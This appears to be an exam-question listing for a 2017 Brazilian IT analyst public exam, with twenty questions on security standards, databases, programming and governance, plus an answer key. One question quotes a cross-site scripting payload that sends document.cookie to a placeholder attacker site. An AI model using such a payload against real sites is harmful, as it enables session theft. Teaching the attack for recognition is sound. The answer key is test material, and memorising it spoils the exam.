Questões de Concurso Público TRT - 24ª REGIÃO (MS) 2017 para Analista Judiciário - Tecnologia da Informação

Foram encontradas 60 questões

Q839361 Programação

Considere os seguintes comandos da linguagem Groovy para criar um array chamado tribunais:


I. String[] tribunais = ["TRT", "TRE", "TCU"]

II. def tribunais = ["TRT", "TRE", "TCU"] as String[]

III. def tribunais = (String[]) ["TRT", "TRE", "TCU"]

IV. def tribunais = ["TRT", "TRE", "TCU"] .toString(new Array( ))


Estão corretas as formas utilizadas APENAS em

Alternativas
Q839362 Banco de Dados
Uma das formas de apresentação de um banco de dados multidimensional é através do modelo estrela. No centro de um modelo estrela encontra-se a tabela de
Alternativas
Q839363 Engenharia de Software
O Gerenciador de Versão
Alternativas
Q839364 Programação
Considere que um Analista está utilizando a ferramenta Maven e precisa definir que seu projeto depende de algumas outras ferramentas. Esta definição é feita inteiramente no POM, usando a tag <dependencies>, dentro da qual cada dependência é definida. Considere o trecho de código abaixo. 
                                      Imagem associada para resolução da questão
Em condições ideais, para que seja definido que o projeto depende do JUnit 4.12 e que o Maven adicione a dependência do JUnit apenas no momento em que os testes forem executados, garantindo que a dependência não seja adicionada no artefato que será gerado, a caixa I deve ser corretamente preenchida com
Alternativas
Q839365 Governança de TI

Considere o grupo integrado de ferramentas, mostrado na figura abaixo, que forma um sistema de modelagem de negócios de uma organização. 


                        Imagem associada para resolução da questão


As aplicações geradas pela organização operam dentro do ...I... e o negócio acessa este ambiente para executar as operações. Os modelos definem o negócio (contexto), regras (lógica, quais dados coletar, de onde, o que fazer) e interfaces (dentro do contexto de uso). Com uma camada de dados compatível com ...II... disponível, a funcionalidade de sistemas legados estará aberta e os dados legados poderão ser integrados.


Preenchem as lacunas I e II, correta e respectivamente: 

Alternativas
Q839366 Segurança da Informação
Desenvolvimento seguro é um requisito para construir um serviço, uma arquitetura, um software e um sistema que respeitem normas de segurança. Dentro de uma política de desenvolvimento seguro, a norma ABNT NBR ISO/IEC 27002:2013 recomenda
Alternativas
Q839367 Segurança da Informação
A norma ABNT NBR ISO/IEC 27004:2010 recomenda que se estabeleça e gerencie um Programa de Medição de Segurança da Informação − PMSI a fim de alcançar os objetivos de medição estabelecidos e adotar o modelo PDCA nas atividades de medição globais da organização. A Norma recomenda que o PMSI inclua os processos de
Alternativas
Q839368 Segurança da Informação

Considere os processos abaixo.


Processos do SGSI

− Planejar.

− Executar.

− Verificar.

− Agir.


Processos de GRSI

− Definição do contexto.

− Avaliação de riscos.

− Definição do plano de tratamento do risco.

− Aceitação do risco.

− Implementação do plano de tratamento do risco.

− Monitoramento contínuo e análise crítica de riscos.

− Manter e melhorar o processo de GRSI.


A norma ABNT NBR ISO/IEC 27005:2011 apresenta o alinhamento do processo do Sistema de Gestão da Segurança da Informação – SGSI e do processo de Gestão de Riscos de Segurança da Informação – GRSI. Segundo a Norma, o processo de GRSI denominado

Alternativas
Q839369 Redes de Computadores

Um Analista, ao consultar a documentação do Zabbix Appliance (3.0.0) para o sistema operacional Linux (Ubuntu 14.04.3), obteve as informações abaixo.

O Zabbix Appliance utiliza-se do IPTables com as seguintes regras configuradas:


− Portas abertas − SSH (22 TCP)

− Zabbixagent (10050 TCP) e Zabbixtrapper (10051 TCP)

− HTTP (80 TCP) e HTTPS (443 TCP)

− SNMP trap (162 UDP)

− Consultas NTP liberadas (53 UDP)

− Pacotes ICMP limitados a 5 por segundo

− Qualquer situação diferente sendo bloqueada


Considerando os fundamentos de redes de computadores e as informações acima é correto afirmar:

Alternativas
Q839370 Segurança da Informação

Considere um cenário em que uma aplicação utiliza dados não confiáveis na construção do seguinte fragmento HTML sem validação ou filtro:


(String) page += "<input name='num_cartao_credito' type='TEXT' value='" +

request.getParameter("credit_card") + " '>";


Considere, ainda, que um atacante modifica o parâmetro 'credit_card' em seu navegador para:


'><script>document.location= 'http://www.atacante.com/cgi-bin/cookie.cgi?

foo='+document.cookie</script>'


Isso causa o envio do ID de sessão da vítima para o site do atacante, permitindo que sequestre a sessão atual do usuário.


Este é um cenário de ataque do tipo

Alternativas
Q839371 Banco de Dados

Uma das atribuições do administrador de banco de dados Oracle é conceder permissões de acesso a usuários do banco de dados. Para isso pode ser utilizada, por exemplo, a instrução abaixo.


GRANT select ON TRT.employees TO paulo WITH ...I... ;


Esta instrução concede privilégio de SELECT na tabela employees do esquema TRT ao usuário paulo. Para este usuário poder estender seus privilégios de objeto para outros usuários, deve ser incluída na lacuna I

Alternativas
Q839372 Banco de Dados
Ao executar a instrução SELECT SUBSTRING ('XY1234Z', 'Y*([0-9]{1,3})'); no PostgreSQL versão 9.4 será exibido o valor
Alternativas
Q839373 Programação
Ao comparar os servidores de aplicação Red Hat JBoss EAP versões 5 e 6, visando a instalação e configuração da versão 6, um Analista afirma corretamente que
Alternativas
Q839374 Programação

Considere os seguintes comandos ou trechos de comandos:


I. Get-NetIPAddress | Sort InterfaceIndex | FT InterfaceIndex, InterfaceAlias, IPAddress - Autosize

II. #!/bin/sh

III. int umInteiro = 5

String frase = " " "número ${umInteiro},

e seu dobro: ${umInteiro + umInteiro}" " "

Em ambientes ideais, é correto afirmar que
Alternativas
Q839375 Redes de Computadores

Consider these statements.


I. OpenSSL is an open source Project that provides a robust, commercial-grade, and full-featured toolkit for the Transport Layer Security (TLS) and Secure Sockets Layer (SSL) protocols. It is also a general-purpose cryptography library.

II. OpenLDAP stands for Open Light Directory Access Protocol. It is a lightweight protocol for accessing directory services, specifically X.500-based directory services. LDAP runs only over TCP/IP services. The LDAP information model is based on entries. An entry is a collection of commands that has a globally-unique Distinguished Name (DN). The DN is used to refer to the entry ambiguously. In LDAP, directory entries are arranged in a non hierarchical tree-like structure.

III. The Active Directory module for Windows PowerShell consolidates a group of cmdlets. These cmdlets can be used to manage Active Directory domains, Active Directory Lightweight Directory Services (AD LDS) configuration sets, and Active Directory Database Mounting Tool instances in a single, self-contained package.


The correct statement(s) is (are)

Alternativas
Q839376 Segurança da Informação
Para verificar a integridade de uma informação pode-se utilizar o resumo que foi gerado a partir dela por meio de algoritmos (ou funções) de hash como o MD5, SHA-1, SHA-256, SHA-512 etc. O SHA-256 e o SHA-512 são funções de hash computadas com palavras, respectivamente, de
Alternativas
Q839377 Segurança da Informação
Um Analista precisa escolher um Certificado de Assinatura Digital para ser utilizado na rede virtual privada da organização onde trabalha e na assinatura de documentos com verificação da integridade das informações. Optou corretamente por um certificado do tipo A2, cuja
Alternativas
Q839378 Sistemas Operacionais

Considere a imagem abaixo.


Imagem associada para resolução da questão


No ambiente VMWare vSphere versão 5, a imagem refere-se ao vSphereStorage Appliance (VSA), que

Alternativas
Q839379 Banco de Dados

Consider the following descriptions of the OLAP operations in multidimensional data:


− The slice operation ..I.. one particular dimension from a given cube and provides a new sub-cube.

− Drill-down can be performed by ..II.. a concept hierarchy for a dimension.

− Roll-up can be performed by ...III... a concept hierarchy for a dimension.

− The pivot operation is also known as rotation. It ...IV... the data axes in view in order to provide an alternative presentation of data.


The correct words to fill in the gaps I, II, III and IV are, respectively,

Alternativas
Q839380 Governança de TI

Consider the following BPMN diagram.


Imagem associada para resolução da questão


According to ITIL v3 2011 edition and business modeling principles, this diagram

Alternativas
Respostas
41: A
42: E
43: D
44: C
45: E
46: C
47: B
48: A
49: D
50: A
51: B
52: A
53: D
54: C
55: D
56: B
57: E
58: E
59: A
60: B